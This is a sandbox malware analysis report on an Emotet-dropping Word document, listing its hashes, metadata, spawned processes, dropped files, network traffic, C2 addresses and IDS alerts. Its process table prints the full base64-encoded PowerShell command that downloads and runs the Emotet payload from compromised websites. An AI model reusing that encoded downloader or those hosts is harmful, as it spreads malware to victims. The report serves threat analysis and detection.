analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | Documento_0910.doc |
| Full analysis: | https://app.any.run/tasks/29c7dac8-cd96-4c59-a6ef-1180857a242d |
| Verdict: | Malicious activity |
| Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
| Analysis date: | October 09, 2019, 16:08:55 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Metal, Subject: 24 hour, Author: Opal Volkman, Keywords: Product, Comments: full-range, Template: Normal.dotm, Last Saved By: Bert Blanda, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 14:30:00 2019, Last Saved Time/Date: Wed Oct 9 14:30:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 173, Security: 0 |
| MD5: | AA530D99AF94D45CF7D9F5AC0833836B |
| SHA1: | 35AC3D7D203C0126EE62B79E68637C89A2884527 |
| SHA256: | 582C2F9A4B2EFDF5CA799D4F115B0699A908582EA984B696CD1F1397B356838E |
| SSDEEP: | 6144:isJdGk8WrLkI07NSU4jJnUATfDXNcFQrQ7/4pm:isJdGk8AX07NSU4VVPXNcFXQpm |
MALICIOUS
Application was dropped or rewritten from another process
- 996.exe (PID: 3584)
- 996.exe (PID: 2512)
- msptermsizes.exe (PID: 1416)
- msptermsizes.exe (PID: 2500)
Emotet process was detected
- 996.exe (PID: 2512)
EMOTET was detected
- msptermsizes.exe (PID: 2500)
Connects to CnC server
- msptermsizes.exe (PID: 2500)
Downloads executable files from the Internet
- powershell.exe (PID: 2828)
Changes the autorun value in the registry
- msptermsizes.exe (PID: 2500)
SUSPICIOUS
PowerShell script executed
- powershell.exe (PID: 2828)
Executed via WMI
- powershell.exe (PID: 2828)
Creates files in the user directory
- powershell.exe (PID: 2828)
Executable content was dropped or overwritten
- powershell.exe (PID: 2828)
- 996.exe (PID: 2512)
Starts itself from another location
- 996.exe (PID: 2512)
INFO
Creates files in the user directory
- WINWORD.EXE (PID: 3048)
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 3048)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
EXIF
FlashPix
| CompObjUserType: | Microsoft Word 97-2003 Document |
|---|---|
| CompObjUserTypeLen: | 32 |
| Manager: | Mitchell |
| HeadingPairs: |
|
| TitleOfParts: | - |
| HyperlinksChanged: | No |
| SharedDoc: | No |
| LinksUpToDate: | No |
| ScaleCrop: | No |
| AppVersion: | 16 |
| CharCountWithSpaces: | 202 |
| Paragraphs: | 1 |
| Lines: | 1 |
| Company: | Bashirian, Thiel and Runolfsson |
| CodePage: | Windows Latin 1 (Western European) |
| Security: | None |
| Characters: | 173 |
| Words: | 30 |
| Pages: | 1 |
| ModifyDate: | 2019:10:09 13:30:00 |
| CreateDate: | 2019:10:09 13:30:00 |
| TotalEditTime: | - |
| Software: | Microsoft Office Word |
| RevisionNumber: | 1 |
| LastModifiedBy: | Bert Blanda |
| Template: | Normal.dotm |
| Comments: | full-range |
| Keywords: | Product |
| Author: | Opal Volkman |
| Subject: | 24 hour |
| Title: | Metal |
Total processes
41
Monitored processes
6
Malicious processes
5
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 3048 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Documento_0910.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
| 2828 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjAGMAOQAwADAAMAAwADcAYgAwADYAPQAnAHgAMAB4ADgAMgA4AGIAMgAwAHgAMAAnADsAJABiADMAMAAzAGMAMAAwAHgAYgAxADAAIAA9ACAAJwA5ADkANgAnADsAJAB4ADIAOAAzADQAMAAzADQAMQA4ADEAPQAnAGIANQA0ADUANAAzAGIAOQB4ADAANAAnADsAJAB4ADIAOQA2ADMAMAA2AGIAMwA0ADEAOQAwAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABiADMAMAAzAGMAMAAwAHgAYgAxADAAKwAnAC4AZQB4AGUAJwA7ACQAYwAwADAAYgAwADAANAA5ADAAMwA1ADYAPQAnAGMAMAAwADMANQA1ADYANwAwADMANgAnADsAJABiADAANAA5ADAAMQA5AGMAMgA1ADAAMQA2AD0AJgAoACcAbgAnACsAJwBlAHcALQAnACsAJwBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAEUAdAAuAHcARQBiAGMAbABJAEUAbgB0ADsAJAB4ADUANgAzADUAMABjADAAMAA0ADAAMAA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGIAcgBpAGQAYQBsAG0AZQBoAG4AZABpAHMAdAB1AGQAaQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBlAGwAbAB2AHEAYQA2AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AbwBzAGgAdQBuAHYAaQByAGcAaQBuAGgAYQBpAHIAYwBvAC4AYwBvAG0ALwBjAG8AbQBwAGEAdABpAGIAaQBsAGkAdAB5AC8AeQBuADgAZgBqADAAMAA0ADEAOQAvAEAAaAB0AHQAcAA6AC8ALwB3AGkAcwBhAHQAbABhAGcAcgBhAG4AagBhAC4AYwBvAG0ALwA3AGIAaQBlAGMAMwAvAHUAbQA5AGoAMwA2ADAANgAvAEAAaAB0AHQAcAA6AC8ALwAzAGQAcwBoAGEAcgBwAGUAZABnAGUALgBjAG8AbQAvAGQAYgBjAG8AbgBuAGUAYwB0AC8AeAAzADgANgA5ADEANQAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHQAaABlAGMAcgBlAGUAawBwAHYALgBjAG8AbQAvAGYAdQBuAGMAdABpAG8AbgAuAHkAbwB1AGQALwBpAGoAMQAvACcALgAiAHMAYABQAGwASQB0ACIAKAAnAEAAJwApADsAJABiADMAYwAyADEANAB4AHgANgA1AGIAMAA9ACcAYgA4AGMAMAAwADEAMQAzADAAMQA4ADAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAHgANAAwADAANwA2ADQAMwAzADAAMwAgAGkAbgAgACQAeAA1ADYAMwA1ADAAYwAwADAANAAwADAAKQB7AHQAcgB5AHsAJABiADAANAA5ADAAMQA5AGMAMgA1ADAAMQA2AC4AIgBkAGAATwBXAG4AbABPAEEAYABEAEYAaQBgAEwAZQAiACgAJAB4ADQAMAAwADcANgA0ADMAMwAwADMALAAgACQAeAAyADkANgAzADAANgBiADMANAAxADkAMAApADsAJAB4AHgANwA2ADQAMwB4ADMAOAB4ADIAYgBjAD0AJwB4ADgANgAxAHgAYgAwADgANAA4ADIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJAB4ADIAOQA2ADMAMAA2AGIAMwA0ADEAOQAwACkALgAiAEwARQBgAE4ARwB0AGgAIgAgAC0AZwBlACAAMgA4ADkAMwAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABgAEEAcgB0ACIAKAAkAHgAMgA5ADYAMwAwADYAYgAzADQAMQA5ADAAKQA7ACQAYwA4ADIAMAAxADAANgAwADYANQAwADMAPQAnAHgAOAAwAGIAYgAxADcANwBiADkANAA5ADMAJwA7AGIAcgBlAGEAawA7ACQAYwBiADAAeAAwADkANAB4AGIAMAAzAD0AJwB4AGIAMwA5AHgAMAA2ADAAMABjADMAMAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABiADYANwA2ADUAYwA5ADcAMwAwADIAPQAnAGMAOAA5AGMAOQA2AGMANQB4ADQAOAAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
| 3584 | "C:\Users\admin\996.exe" | C:\Users\admin\996.exe | — | powershell.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
| 2512 | --9005f774 | C:\Users\admin\996.exe | 996.exe | |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
| 1416 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 996.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
| 2500 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | msptermsizes.exe | |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Version: 1, 0, 0, 1 | ||||
Total events
1 717
Read events
1 224
Write events
0
Delete events
0
Modification events
Executable files
2
Suspicious files
2
Text files
0
Unknown types
15
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRC94.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2828 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JPXKFF75JNZYFQ98CMQG.temp | — | |
MD5:— | SHA256:— | |||
| 3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\93E5F912.wmf | wmf | |
MD5:8718FF1072AAB1BF50C13DA22F8B1402 | SHA256:107EEBFD99A54473397AE782701FE2F026B27D253DE8C63309A3E56F71662868 | |||
| 3048 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:789A80E7EAA48B5903FD26EC43984739 | SHA256:70098F0291EF162254E6FFA68E484F8DCFADC46436AA37E6ABBF923BECFFAF5B | |||
| 3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\625D4AF0.wmf | wmf | |
MD5:4BEEC38493613A0C99E41892BE780818 | SHA256:D42D6FD6D9AD3A896E69417B235F8D0FD8464FFA9585E43DD74DF538697A2616 | |||
| 3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8780CF3C.wmf | wmf | |
MD5:E4BED036296A739EC3F8DFAC25B1BC04 | SHA256:F2B2AFF4ED69CC10F4B7A1E0CBB262BA2323D073796F88A69460349D34EFF604 | |||
| 3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6B1E1E7E.wmf | wmf | |
MD5:CB827D605694FF931573624D78A21BED | SHA256:8DE6BB584F7B7C0A76DEF382A4619979C5FC21B03CE342AECF63273B5443142A | |||
| 3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6AFBC067.wmf | wmf | |
MD5:906D34AAB978D44CC36E9E4A17952ACD | SHA256:3E7A06A2F602033365D7C299BBFDDEA29D54CB7C5E74FCD362113DB8B54F4729 | |||
| 2828 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF101791.TMP | binary | |
MD5:57F2BEBD8AB4D14DFF05F8F1EE1B1091 | SHA256:24089794FD7207234A86BFD7344771ABD7A0BC15DCEB1A256EF927F010B65B1F | |||
| 3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\77BBC4AA.wmf | wmf | |
MD5:493B28FFB650107603A2D44B413E1691 | SHA256:C14D30E58093377ECD80D38AF496FC7E994E71EEED8841C3DFFC4CDC98EF6784 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
1
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2828 | powershell.exe | GET | 200 | 103.129.99.179:80 | http://www.bridalmehndistudio.com/wp-admin/ellvqa6/ | unknown | executable | 612 Kb | suspicious |
2500 | msptermsizes.exe | GET | — | 37.187.5.82:8080 | http://37.187.5.82:8080/whoami.php | FR | — | — | malicious |
2500 | msptermsizes.exe | GET | — | 37.187.5.82:8080 | http://37.187.5.82:8080/whoami.php | FR | — | — | malicious |
2500 | msptermsizes.exe | POST | 200 | 91.83.93.105:8080 | http://91.83.93.105:8080/vermont/ | HU | binary | 1.38 Mb | malicious |
2500 | msptermsizes.exe | POST | — | 91.83.93.105:8080 | http://91.83.93.105:8080/arizona/schema/ | HU | — | — | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2500 | msptermsizes.exe | 91.83.93.105:8080 | — | Invitech Megoldasok Zrt. | HU | malicious |
2500 | msptermsizes.exe | 37.187.5.82:8080 | — | OVH SAS | FR | malicious |
2828 | powershell.exe | 103.129.99.179:80 | www.bridalmehndistudio.com | — | — | suspicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
www.bridalmehndistudio.com |
| suspicious |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2828 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2828 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
2828 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2828 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2500 | msptermsizes.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
2500 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3 ETPRO signatures available at the full report